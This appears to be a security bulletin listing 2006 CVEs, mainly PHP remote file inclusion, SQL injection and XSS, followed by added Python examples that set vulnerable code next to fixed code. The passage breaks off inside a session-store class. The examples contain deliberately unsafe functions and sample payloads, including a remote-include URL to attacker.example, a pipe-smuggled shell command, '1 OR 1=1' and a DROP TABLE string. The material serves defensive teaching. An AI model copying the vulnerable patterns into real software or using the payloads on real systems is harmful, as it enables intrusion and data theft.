| Primary Vendor -- Product | Description | CVSS Score | Source & Patch Info |
|---|---|---|---|
| Ageet -- AGEphone | Stack-based buffer overflow in sipd.dll in AGEphone 1.24 and 1.38.1 allows remote attackers to execute arbitrary code via a crafted UDP SIP packet. | 7.0 | CVE-2006-4029 BUGTRAQ FULLDISC OTHER-REF BID FRSIRT SECTRACK SECUNIA XF |
| Archangel Management -- Archangel Weblog | Multiple cross-site scripting (XSS) vulnerabilities in Archangel Management Archangel Weblog 0.90.02 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Comment section. | 7.0 | CVE-2006-4091 BUGTRAQ BID SECTRACK XF |
| Barracuda Networks -- Barracuda Spam Firewall | Login.pm in Barracuda Spam Firewall (BSF) 3.3.01.001 through 3.3.03.053 contains a hard-coded password for the guest account, which allows remote attackers to read sensitive information such as e-mail logs, and possibly e-mail contents and the admin password. | 7.0 | CVE-2006-4001 BUGTRAQ BID XF |
| Barracuda Networks -- Barracuda Spam Firewall | preview_email.cgi in Barracuda Spam Firewall (BSF) 3.3.01.001 through 3.3.03.053 allows remote attackers to execute commands via shell metacharacters ("\|" pipe symbol) in the file parameter. NOTE: the attack can be extended to arbitrary commands by the presence of CVE-2006-4000. | 7.0 | CVE-2006-4081 BUGTRAQ BUGTRAQ |
| Barracuda Networks -- Barracuda Spam Firewall | Barracuda Spam Firewall (BSF), possibly 3.3.03.053, contains a hard-coded password for the admin account for logins from 127.0.0.1 (localhost), which allows local users to gain privileges. | 7.0 | CVE-2006-4082 BUGTRAQ |
| Brad Fears -- phpCodeCabinet | PHP remote file inclusion vulnerability in Beautifier/Core.php in Brad Fears phpCodeCabinet 0.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the BEAUT_PATH parameter. | 7.0 | CVE-2006-4044 FULLDISC OTHER-REF BID FRSIRT SECUNIA |
| CakePHP -- CakePHP | Cross-site scripting (XSS) vulnerability in cake/libs/error.php in CakePHP before 1.1.7.3363 allows remote attackers to inject arbitrary web script or HTML via the URL, which is reflected back in a 404 ("Not Found") error page. NOTE: some of these details are obtained from third-party information. | 7.0 | CVE-2006-4067 OTHER-REF SECUNIA |
| CivicSpace -- CivicSpace | Multiple cross-site scripting (XSS) vulnerabilities in CivicSpace 0.8.5 allow remote attackers to inject arbitrary web script or HTML via the (1) Subject, (2) Comment, and (3) Add new comment sections. | 7.0 | CVE-2006-4088 BUGTRAQ BID |
| Clam Anti-Virus -- ClamAV | Heap-based buffer overflow in the pefromupx function in libclamav/upx.c in Clam AntiVirus (ClamAV) 0.81 through 0.88.3 allows remote attackers to execute arbitrary code via a crafted UPX-packed file containing sections with large rsize values. | 7.0 | CVE-2006-4018 OTHER-REF CLAMAV GENTOO MANDRIVA BID FRSIRT SECUNIA SECUNIA SECUNIA |
| Comet -- Comet Webfile Manager | PHP remote file inclusion vulnerability in CheckUpload.php in Vincenzo Valvano Comet WebFileManager (CWFM) 0.9.1, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the Language parameter. | 7.0 | CVE-2006-4077 OTHER-REF BID FRSIRT SECUNIA |
| Computer Associates -- eTrust Antivirus WebScan | Unspecified vulnerability in CA eTrust Antivirus WebScan allows remote attackers to execute arbitrary code due to "improper bounds checking when processing certain user input." | 7.0 | CVE-2006-3975 OTHER-REF SECUNIA |
| Computer Associates -- eTrust Antivirus WebScan | Unspecified vulnerability in CA eTrust Antivirus WebScan before 1.1.0.1048 has unknown impact and remote attack vectors related to "improper processing of outdated WebScan components." | 7.0 | CVE-2006-3977 OTHER-REF SECUNIA |
| CounterChaos -- CounterChaos | SQL injection vulnerability in counterchaos.php in CounterChaos 0.48c and earlier allows remote attackers to execute arbitrary SQL commands via the Referer HTTP header. | 7.0 | CVE-2006-4035 BUGTRAQ OTHER-REF BID FRSIRT SECUNIA |
| Csaba Godor -- SAPID Blog Beta 2 | Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php. | 7.0 | CVE-2006-4063 OTHER-REF FRSIRT XF |
| David Walker -- phpAutoMembersArea | PHP remote file inclusion vulnerability in auto_check_renewals.php in phpAutoMembersArea (phpAMA) 3.2.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the installed_config_file parameter. | 7.0 | CVE-2006-4050 BUGTRAQ OTHER-REF BID |
| DeluxeBB -- DeluxeBB | pm.php (aka the PM system) in DeluxeBB 1.08, and possibly earlier, allows remote attackers to bypass authentication by providing an arbitrary username in the membercookie cookie parameter. | 7.0 | CVE-2006-4078 BUGTRAQ BID FRSIRT SECUNIA XF |
| DeluxeBB -- DeluxeBB | Cross-site scripting (XSS) vulnerability in newpost.php in DeluxeBB 1.08, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the subject parameter (aka the topic title field). | 7.0 | CVE-2006-4079 BUGTRAQ BID XF |
| Ehmig -- ME Download System | Multiple PHP remote file inclusion vulnerabilities in ME Download System 1.3 allow remote attackers to execute arbitrary PHP code via a URL in the (1) Vb8878b936c2bd8ae0cab parameter to (a) inc/sett_style.php or (b) inc/sett_smilies.php; or the (2) Vb6c4d0e18a204a63b38f, (3) V18a78b93c3adaaae84e2, or (4) V9ae5d2ca9e9e787969ff parameters to (c) inc/datei.php. NOTE: the provenance of this information is unknown; the details are obtained from third-party information. | 7.0 | CVE-2006-4054 FRSIRT SECUNIA |
| Ekilat LLC -- php(Reactor) | PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter. | 7.0 | CVE-2006-3983 OTHER-REF BID FRSIRT XF |
| Fenestrae -- Faxination Server | Unspecified vulnerability in Fenestrae Faxination Server allows remote attackers to execute arbitrary code via a crafted packet. | 7.0 | CVE-2006-4037 OTHER-REF BID FRSIRT SECUNIA |
| GaesteChaos -- GaesteChaos | Multiple cross-site scripting (XSS) vulnerabilities in eintragen.php in GaesteChaos 0.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) gastname or (2) gastwohnort parameters. | 7.0 | CVE-2006-4038 FULLDISC BID FRSIRT SECUNIA |
| Gianluca Baldo -- Phpauction; phpAdsNew -- phpAdsNew | PHP remote file inclusion vulnerability in phpAdsNew/view.inc.php in Albasoftware Phpauction 2.1 and possibly later versions, with phpAdsNew 2.0.5, allows remote attackers to execute arbitrary PHP code via a URL in the phpAds_path parameter. | 7.0 | CVE-2006-3984 BUGTRAQ OTHER-REF OTHER-REF BID XF |
| IBM -- Informix IDS | Buffer overflow in IBM Informix Dynamic Server (IDS) before 9.40.TC7 and 10.00 before 10.00.TC3, when running on Windows, allows remote attackers to execute arbitrary code via a long username. | 7.0 | CVE-2006-3853 IBM BID FRSIRT SECUNIA XF |
| IBM -- Informix Dynamic Database Server | Multiple buffer overflows in IBM Informix Dynamic Server (IDS) before 9.40.TC6 and 10.00 before 10.00.TC3 allow remote authenticated users to execute arbitrary code via (1) the getname function, as used by (a) _sq_remview, (b) _sq_remproc, (c) _sq_remperms, (d) _sq_distfetch, and (e) _sq_dcatalog; and the (2) SET DEBUG FILE, (3) IFX_FILE_TO_FILE, (4) FILETOCLOB, (5) LOTOFILE, and (6) DBINFO functions (product defect IDs 171649, 171367, 171387, 171391, 171906, 172179). | 7.0 | CVE-2006-3857 OTHER-REF BID FRSIRT SECUNIA XF XF XF XF XF XF |
| IBM -- Informix IDS | Buffer overflow in IBM Informix Dynamic Server (IDS) 9.40.TC5 through 9.40.xC7 and 10.00.TC1 through 10.00.xC3 allows attackers to execute arbitrary code via the SQLIDEBUG environment variable (envariable). | 7.0 | CVE-2006-3862 IBM |
| Jetbox -- Jetbox CMS | Session fixation vulnerability in Jetbox CMS 2.1 SR1 allows remote attackers to hijack web sessions via a crafted link and the administrator section. | 7.0 | CVE-2006-3583 BUGTRAQ OTHER-REF SECUNIA |
| Jetbox -- CMS | Dynamic variable evaluation vulnerability in index.php in Jetbox CMS 2.1 SR1 allows remote attackers to overwrite configuration variables via URL parameters, which are evaluated as PHP variable variables. | 7.0 | CVE-2006-3584 BUGTRAQ SECUNIA SECUNIA |
| Jetbox -- Jetbox CMS | Multiple cross-site scripting (XSS) vulnerabilities in Jetbox CMS 2.1 SR1 allow remote attackers to inject arbitrary web script or HTML via the (1) login parameter in admin/cms/index.php, (2) unspecified parameters in the "Supply news" page in formmail.php, (3) the URL in the "Site statistics" page, and the (4) query_string parameter when performing a search. | 7.0 | CVE-2006-3585 BUGTRAQ OTHER-REF SECUNIA |
| Jetbox -- Jetbox CMS | SQL injection vulnerability in Jetbox CMS 2.1 SR1 allows remote attackers to execute arbitrary SQL commands via the (1) frontsession COOKIE parameter and (2) view parameter in index.php, and the (3) login parameter in admin/cms/index.php. | 7.0 | CVE-2006-3586 BUGTRAQ OTHER-REF SECUNIA |
| Knusperleicht -- Quickie | PHP remote file inclusion vulnerability in quickie.php in Knusperleicht Quickie, probably 0.2, allows remote attackers to execute arbitrary PHP code via a URL in the QUICK_PATH parameter. | 7.0 | CVE-2006-3982 BUGTRAQ BID |
| Knusperleicht -- Newsletter | PHP remote file inclusion vulnerability in index.php in Knusperleicht Newsletter 3.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the NL_PATH parameter. | 7.0 | CVE-2006-3986 BUGTRAQ Milw0rm BID FRSIRT SECUNIA XF |
| Knusperleicht -- Guestbook | PHP remote file inclusion vulnerability in index.php in Knusperleicht Guestbook 3.5 allows remote attackers to execute arbitrary PHP code via a URL in the GB_PATH parameter. | 7.0 | CVE-2006-4007 BUGTRAQ BID XF |
| Knusperleicht -- Faq | PHP remote file inclusion vulnerability in index.php in Knusperleicht Faq 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the faq_path parameter. | 7.0 | CVE-2006-4008 BUGTRAQ BID XF |
| Macromedia -- ColdFusion MX | The AdminAPI of ColdFusion MX 7 allows attackers to bypass authentication by using "programmatic access" to the adminAPI instead of the ColdFusion Administrator. | 7.0 | CVE-2006-3979 ADOBE |
| Mambo -- Mambo Gallery Manager | PHP remote file inclusion vulnerability in administrator/components/com_mgm/help.mgm.php in Mambo Gallery Manager (MGM) 0.95r2 and earlier for Mambo 4.5 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. | 7.0 | CVE-2006-3980 BUGTRAQ OTHER-REF BID FRSIRT SECUNIA XF |
| Mambo -- Mambo Gallery Manager | PHP remote file inclusion vulnerability in about.mgm.php in Mambo Gallery Manager (MGM) 0.95r2 and earlier for Mambo 4.5 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. NOTE: the provenance of this information is unknown; the details are obtained from third-party information. | 7.0 | CVE-2006-3981 FRSIRT XF |
| Microsoft -- Hyperlink Object Library | Unspecified vulnerability in Microsoft Hyperlink Object Library (hlink.dll), possibly a buffer overflow, allows user-assisted attackers to execute arbitrary code via crafted hyperlinks that are not properly handled when hlink.dll "uses a file containing a malformed function," aka "Hyperlink Object Function Vulnerability." | 7.0 | CVE-2006-3438 MS CERT CERT-VN |
| Microsoft -- Windows 2000; Microsoft -- Windows Server 2003; Microsoft -- Windows XP | Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. | 10.0 | CVE-2006-3439 MS CERT CERT-VN FRSIRT SECUNIA |
| Microsoft -- Windows 2000; Microsoft -- Windows Server 2003; Microsoft -- Windows XP | Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." | 10.0 | CVE-2006-3440 MS CERT CERT-VN |
| Microsoft -- Windows 2000; Microsoft -- Windows Server 2003; Microsoft -- Windows XP | Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. | 10.0 | CVE-2006-3441 MS CERT CERT-VN |
| Microsoft -- Windows 2000 | Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." | 7.0 | CVE-2006-3444 MS BID |
| Microsoft -- PowerPoint | Unspecified vulnerability in Microsoft PowerPoint 2000 through 2003, possibly a buffer overflow, allows user-assisted remote attackers to execute arbitrary commands via a malformed record in the BIFF file format used in a PPT file, a different issue than CVE-2006-1540, aka "Microsoft PowerPoint Malformed Record Vulnerability." | 7.0 | CVE-2006-3449 MS CERT CERT-VN BUGTRAQ OTHER-REF |
| Microsoft -- Internet Explorer | Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using the document.getElementByID Javascript function to access crafted Cascading Style Sheet (CSS) elements, and possibly other unspecified vectors involving certain layout positioning combinations in an HTML file. | 7.0 | CVE-2006-3450 MS CERT-VN BID CERT BUGTRAQ OTHER-REF FRSIRT SECUNIA |
| Microsoft -- Internet Explorer | Microsoft Internet Explorer 5 SP4 and 6 do not properly garbage collect when "multiple imports are used on a styleSheets collection" to construct a chain of Cascading Style Sheets (CSS), which allows remote attackers to execute arbitrary code via unspecified vectors. | 7.0 | CVE-2006-3451 MS CERT CERT-VN BUGTRAQ OTHER-REF FRSIRT SECUNIA |
| Microsoft -- Internet Explorer | Microsoft Internet Explorer 5.01 SP4 and 6 do not properly handle various HTML layout component combinations, which allows user-assisted remote attackers to execute arbitrary code via a crafted HTML file that leads to memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." | 7.0 | CVE-2006-3637 MS CERT CERT-VN FRSIRT SECUNIA |
| Microsoft -- Internet Explorer | Microsoft Internet Explorer 5.01 and 6 do not properly handle uninitialized COM objects, which allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code, aka "COM Object Instantiation Memory Corruption Vulnerability." | 7.0 | CVE-2006-3638 MS FRSIRT SECUNIA |
| Microsoft -- Internet Explorer | Microsoft Internet Explorer 5.01 and 6 do not properly identify the originating domain zone when handling redirects, which allows remote attackers to read cross-domain web pages and possibly execute code via unspecified vectors involving a crafted web page, aka "Source Element Cross-Domain Vulnerability." | 7.0 | CVE-2006-3639 MS CERT CERT-VN FRSIRT SECUNIA |
| Microsoft -- Windows 2000; Microsoft -- Windows Server 2003; Microsoft -- Windows XP | Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory-resident applications, and incorrectly "unloading chained exception." | 7.0 | CVE-2006-3648 MS CERT CERT-VN FRSIRT |
| MIT -- Kerberos 5 | The (1) ftpd and (2) ksu programs in MIT Kerberos 5 (krb5) up to 1.5, and 1.4.x before 1.4.4, do not check return codes for setuid calls, which might allow local users to gain privileges by causing setuid to fail to drop privileges. NOTE: as of 2006-08-08, it is not known whether an exploitable attack scenario exists for these issues. | 10.0 | CVE-2006-3084 OTHER-REF CERT-VN |
| Mitch Murray -- Eremove | Buffer overflow in the preview_create function in gui.cpp in Mitch Murray Eremove 1.4 allows remote attackers to cause a denial of service (application crash), and possibly execute arbitrary code, via a large e-mail attachment. | 7.0 | CVE-2006-4057 BUGTRAQ OTHER-REF BID SECTRACK |
| ModernGigabyte -- ModernBill | PHP remote file inclusion vulnerability in include/html/config.php in ModernGigabyte ModernBill 1.6 allows remote attackers to execute arbitrary PHP code via a URL in the DIR parameter. | 7.0 | CVE-2006-4034 BUGTRAQ OTHER-REF BID XF |
| myWebland -- myEvent | PHP remote file inclusion vulnerability in viewevent.php in myWebland myEvent 1.x allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter, a different vector than CVE-2006-4040. NOTE: the provenance of this information is unknown; the details are obtained from third-party information. | 7.0 | CVE-2006-4083 FRSIRT SECUNIA |
| Netious CMS -- Netious CMS | Netious CMS 0.4 initializes session IDs based on the client IP address, which allows remote attackers to gain access to the administration section when originating from the same IP address as the administrator. NOTE: the provenance of this information is unknown; the details are obtained from third-party information. | 10.0 | CVE-2006-4048 FRSIRT SECUNIA |
| Novell -- GroupWise WebAccess | Cross-site scripting (XSS) vulnerability in Novell GroupWise WebAccess 6.5 and 7 before 20060727 allows remote attackers to inject arbitrary web script or HTML via an encoded SCRIPT element in an e-mail message with the UTF-7 character set, as demonstrated by the "+ADw-SCRIPT+AD4-" sequence. | 7.0 | CVE-2006-3817 FULLDISC INFOBYTE NOVELL NOVELL FRSIRT SECUNIA XF |
| OZJournals -- OZJournals | Cross-site scripting (XSS) vulnerability in index.php in Elaine Aquino Online Zone Journals (OZJournals) 1.5 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. NOTE: the provenance of this information is unknown; the details are obtained from third-party information. | 7.0 | CVE-2006-4086 FRSIRT SECUNIA |
| phpCC -- phpCC | Multiple PHP remote file inclusion vulnerabilities in Fabian Hainz phpCC Beta 4.2 allow remote attackers to execute arbitrary PHP code via a URL in the base_dir parameter to (1) login.php, (2) reactivate.php, or (3) register.php. | 7.0 | CVE-2006-4073 BUGTRAQ Milw0rm BID FRSIRT XF |
| PHPSavant -- Savant2 | Multiple PHP remote file inclusion vulnerabilities in Paul M. Jones Savant2, possibly when used with the com_mtree component for Mambo and Joomla!, allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter in (1) Savant2_Plugin_stylesheet.php, (2) Savant2_Compiler_basic.php, (3) Savant2_Error_pear.php, (4) Savant2_Error_stack.php, (5) Savant2_Filter_colorizeCode.php, (6) Savant2_Filter_trimwhitespace.php, (7) Savant2_Plugin_ahref.php, (8) Savant2_Plugin_ahrefcontact.php, (9) Savant2_Plugin_ahreflisting.php, (10) Savant2_Plugin_ahreflistingimage.php, (11) Savant2_Plugin_ahrefmap.php, (12) Savant2_Plugin_ahrefownerlisting.php, (13) Savant2_Plugin_ahrefprint.php, (14) Savant2_Plugin_ahrefrating.php, (15) Savant2_Plugin_ahrefrecommend.php, (16) Savant2_Plugin_ahrefreport.php, (17) Savant2_Plugin_ahrefreview.php, (18) Savant2_Plugin_ahrefvisit.php, (19) Savant2_Plugin_checkbox.php, (20) Savant2_Plugin_cycle.php, (21) Savant2_Plugin_dateformat.php, (22) Savant2_Plugin_editor.php, (23) Savant2_Plugin_form.php, (24) Savant2_Plugin_image.php, (25) Savant2_Plugin_input.php, (26) Savant2_Plugin_javascript.php, (27) Savant2_Plugin_listalpha.php, (28) Savant2_Plugin_listingname.php, (29) Savant2_Plugin_modify.php, (30) Savant2_Plugin_mtpath.php, (31) Savant2_Plugin_options.php, (32) Savant2_Plugin_radios.php, (33) Savant2_Plugin_rating.php, or (34) Savant2_Plugin_textarea.php. | 7.0 | CVE-2006-3990 BUGTRAQ BID SECTRACK XF |
| Pike -- Pike | SQL injection vulnerability in Pike before 7.6.86, when using a Postgres database server, allows remote attackers to execute arbitrary SQL commands via unspecified attack vectors. | 7.0 | CVE-2006-4041 PIKE GENTOO BID FRSIRT SECUNIA SECUNIA XF |
| Thomas Pequet -- phpPrintAnalyzer | PHP remote file inclusion vulnerability in index.php in Thomas Pequet phpPrintAnalyzer 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the rep_par_rapport_racine parameter. | 7.0 | CVE-2006-4061 BUGTRAQ BID |
| Torbstoff -- Torbstoff News | PHP remote file inclusion vulnerability in news.php in Torbstoff News 4 allows remote attackers to execute arbitrary PHP code via a URL in the pfad parameter. | 7.0 | CVE-2006-4045 OTHER-REF FRSIRT SECUNIA |
| Turnkey Web Tools -- PHP Live Helper | PHP remote file inclusion vulnerability in global.php in Turnkey Web Tools PHP Live Helper 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter. | 7.0 | CVE-2006-4051 BUGTRAQ ECHO Milw0rm BID SECTRACK |
| Turnkey Web Tools -- PHP Simple Shop | Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools PHP Simple Shop 2.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) admin/index.php, (2) admin/adminindex.php, (3) admin/adminglobal.php, (4) admin/login.php, (5) admin/menu.php, or (6) admin/header.php. | 7.0 | CVE-2006-4052 OTHER-REF OTHER-REF SECUNIA |
| User Home Pages -- User Home Pages | Multiple PHP remote file inclusion vulnerabilities in (1) uhp_config.php, and possibly (2) footer.php, (3) functions.php, (4) install.uhp.php, (5) toolbar.uhp.html.php, (6) uhp.class.php, and (7) uninstall.uhp.php, in the UHP (User Home Pages) 0.5 component (aka com_uhp) for Mambo or Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. | 7.0 | CVE-2006-3995 OTHER-REF OTHER-REF BID FRSIRT OSVDB OSVDB SECUNIA XF |
| USolved -- NEWSolved Lite | Multiple PHP remote file inclusion vulnerabilities in USOLVED NEWSolved Lite 1.9.2, and possibly earlier, allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) newsscript_lyt.php, (2) newsticker/newsscript_get.php, (3) inc/output/news_theme1.php, (4) inc/output/news_theme2.php, or (5) inc/output/news_theme3.php. | 7.0 | CVE-2006-4059 BUGTRAQ OTHER-REF OTHER-REF OTHER-REF BID FRSIRT SECUNIA |
| Voc-Project -- Voodoo Chat | PHP remote file inclusion vulnerability in index.php in Vlad Vostrykh Voodoo chat 1.0RC1b and earlier allows remote attackers to execute arbitrary PHP code via a URL in the file_path parameter. | 7.0 | CVE-2006-3991 Milw0rm BID FRSIRT |
| VWar -- Virtual War | SQL injection vulnerability in war.php in Virtual War (Vwar) 1.5.0 and earlier allows remote attackers to execute arbitrary SQL commands via the page parameter. | 7.0 | CVE-2006-4010 BUGTRAQ BID |
| Web-Scripts -- Visual Events Calendar | PHP remote file inclusion vulnerability in calendar.php in Visual Events Calendar 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the cfg_dir parameter. | 7.0 | CVE-2006-4060 BUGTRAQ OTHER-REF BID SECTRACK SECUNIA |
| Webligo -- BlogHoster | Cross-site scripting (XSS) vulnerability in Webligo BlogHoster 2.2 allows remote attackers to inject arbitrary web script or HTML via the "From:" part of a comment post. | 7.0 | CVE-2006-4090 BUGTRAQ |
| WoWRoster -- WoWRoster | PHP remote file inclusion vulnerability in hsList.php in WoWRoster (aka World of Warcraft Roster) 1.5.x and earlier allows remote attackers to execute arbitrary PHP code via a URL in the subdir parameter. | 7.0 | CVE-2006-3997 BUGTRAQ OTHER-REF BID XF SECUNIA |
| WoWRoster -- WoWRoster | PHP remote file inclusion vulnerability in conf.php in WoWRoster (aka World of Warcraft Roster) 1.5.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the subdir parameter. | 7.0 | CVE-2006-3998 OTHER-REF OTHER-REF BID FRSIRT XF |
| XennoBB -- XennoBB | SQL injection vulnerability in profile.php in XennoBB 2.1.0 and earlier allows remote authenticated users to execute arbitrary SQL commands via the (1) bday_day, (2) bday_month, and (3) bday_year parameters in the personal section. | 7.0 | CVE-2006-4025 BUGTRAQ BID |
| XMB Software -- XMB Forum | SQL injection vulnerability in the u2u_send_recp function in u2u.inc.php in XMB (aka extreme message board) 1.9.6 Alpha and earlier allows remote attackers to execute arbitrary SQL commands via the u2uid parameter to u2u.php, which is read directly from $_POST and so bypasses the protection scheme. | 7.0 | CVE-2006-3994 OTHER-REF BID FRSIRT SECUNIA |
| YenerTurk -- YenerTurk Haber Script | SQL injection vulnerability in default.asp in YenerTurk Haber Script 1.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. | 7.0 | CVE-2006-4064 OTHER-REF BID FRSIRT SECUNIA |
| ZoneMetrics -- ZoneX Publishers Gold Edition | PHP remote file inclusion vulnerability in includes/usercp_register.php in ZoneMetrics ZoneX Publishers Gold Edition 1.0.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | 7.0 | CVE-2006-4036 BUGTRAQ BID FRSIRT SECUNIA |
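Most rows in this bulletin are the same defect: a request parameter named something like `*_path`, `abs_path` or `mosConfig_absolute_path` is used as the prefix of an `include`, so a value of `http://attacker/shell.txt?` pulls in and executes remote code (CVE-2006-4044 and the other "PHP remote file inclusion" rows). The preview_email.cgi row (CVE-2006-4081) is the same mistake one layer down: a `file` parameter spliced into a shell command line, where `|` starts a second command. The following is an added example, not code from Barracuda or any of the PHP projects listed; the base directory, spool directory and function names are constructed for illustration. It shows both unsafe patterns next to the two checks that close them: resolving the parameter under a fixed base directory and rejecting any URL scheme, and building the command as an argv list with an allowlisted file name instead of a shell string.

```python
import os
import re
from urllib.parse import urlsplit

# Constructed paths for this example; they belong to no product in the table.
INCLUDE_BASE = "/var/www/app/inc"
SPOOL_DIR = "/var/spool/quarantine"


def vulnerable_include_path(param):
    """The RFI pattern: the attacker-supplied prefix is used as-is, so a URL
    such as http://attacker.example/shell.txt? becomes the include target."""
    return param + "/Core.php"


def safe_include_path(param, base_dir=INCLUDE_BASE):
    """Resolve an attacker-controlled path parameter strictly inside base_dir.
    Returns the absolute path, or None for URL schemes (http://, php://, ...),
    absolute paths, NUL bytes, and anything that escapes base_dir after
    normalisation (../ traversal)."""
    if not param or "\x00" in param:
        return None
    if urlsplit(param).scheme:          # any scheme at all means remote/stream inclusion
        return None
    if os.path.isabs(param):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, param))
    if candidate == base or not candidate.startswith(base + os.sep):
        return None
    return candidate


# Allowlist for the preview file name: starts alphanumeric, then a short run of
# [A-Za-z0-9_.-]; no slash, no shell metacharacters, no ".." possible.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def vulnerable_preview_command(file_param):
    """The command-injection pattern: the parameter lands in a shell string, so
    'msg.eml|id' makes the shell run id as a second command."""
    return "cat " + SPOOL_DIR + "/" + file_param


def safe_preview_argv(file_param):
    """Build the preview command as an argv list (to be run without a shell,
    e.g. subprocess.run(argv)) with the file name allowlisted, so '|', ';',
    '$(' and friends never reach a command parser. Returns None when rejected."""
    if not SAFE_NAME.fullmatch(file_param):
        return None
    return ["cat", os.path.join(SPOOL_DIR, file_param)]
```

The scheme check is deliberately broader than "starts with http": `php://input`, `data:` and `ftp://` are all inclusion vectors in PHP, and the only value worth accepting is a relative path that still resolves under the base directory after `realpath`.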
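The SQL injection rows (CounterChaos via the Referer header, CVE-2006-4035; Jetbox via the frontsession cookie, CVE-2006-3586; Virtual War, XennoBB, XMB and YenerTurk via ordinary parameters) share one root cause: a value from the request is concatenated into the query text. The source of the value does not matter; a header or cookie is as attacker-controlled as a GET parameter. The following added example (not the products' code; the table, rows and payload are constructed) runs the same lookup both ways against an in-memory SQLite database so the difference is visible in the result set rather than described.

```python
import sqlite3

# Constructed sample data: only the row with published = 1 should ever be public.
SAMPLE_ROWS = [
    (1, "public post", 1),
    (2, "draft post", 0),
    (3, "admin note", 0),
]

# Constructed payload: appended to "id = " it turns the WHERE clause into a tautology
# because AND binds tighter than OR.
PAYLOAD = "1 OR 1=1"


def make_db():
    """In-memory stand-in for a news/forum table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def fetch_vulnerable(conn, id_param):
    """String-built query: the parameter text is parsed as SQL, so the
    published = 1 filter can be argued away by the client."""
    sql = "SELECT title FROM news WHERE published = 1 AND id = " + id_param
    return [row[0] for row in conn.execute(sql)]


def fetch_safe(conn, id_param):
    """Bound parameter: the value is compared, never parsed. A non-numeric id
    is rejected up front instead of being coerced or interpolated."""
    if not id_param.isdigit():
        return []
    rows = conn.execute(
        "SELECT title FROM news WHERE published = 1 AND id = ?", (int(id_param),))
    return [row[0] for row in rows]


def record_referer(conn, referer):
    """The Referer-header case: free-form text that must be stored, not parsed.
    Binding it means a value like http://x/'); DROP TABLE news; -- is just a string.
    Returns the number of stored hits."""
    conn.execute("CREATE TABLE IF NOT EXISTS hits (referer TEXT)")
    conn.execute("INSERT INTO hits (referer) VALUES (?)", (referer,))
    return conn.execute("SELECT COUNT(*) FROM hits").fetchone()[0]
```

`fetch_safe` also refuses anything that is not a bare integer before touching the database; binding alone is enough to stop injection, but rejecting malformed input early keeps the bad value out of logs and error messages too.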
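Three rows describe session handling that trusts the wrong thing: DeluxeBB accepts whatever username sits in the membercookie cookie (CVE-2006-4078), Netious CMS derives the session ID from the client IP so anyone sharing the administrator's address inherits the session (CVE-2006-4048), and Jetbox CMS keeps an attacker-chosen ID across login, the classic session-fixation setup (CVE-2006-3583). The following added example is not code from any of these products; the store, key handling and names are constructed. It shows the two weak patterns alongside a session store where the cookie carries only a random ID plus an HMAC, and where a successful login discards the presented ID and issues a fresh one.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; generated at import here only so the example is self-contained.
SERVER_KEY = secrets.token_bytes(32)


def vulnerable_user_from_cookie(membercookie):
    """The DeluxeBB pattern: the cookie value *is* the identity, so setting
    membercookie=admin is enough to be admin."""
    return membercookie


def weak_session_id(client_ip):
    """The Netious pattern: an ID derived from the client address is identical
    for every client behind that address (NAT, proxy) and is computable by
    anyone who knows the administrator's IP."""
    return hashlib.sha1(client_ip.encode()).hexdigest()


class SessionStore:
    """Server-side sessions keyed by a random ID carried in an HMAC-signed cookie.
    The cookie holds no trusted claims, the ID is unrelated to the client, and
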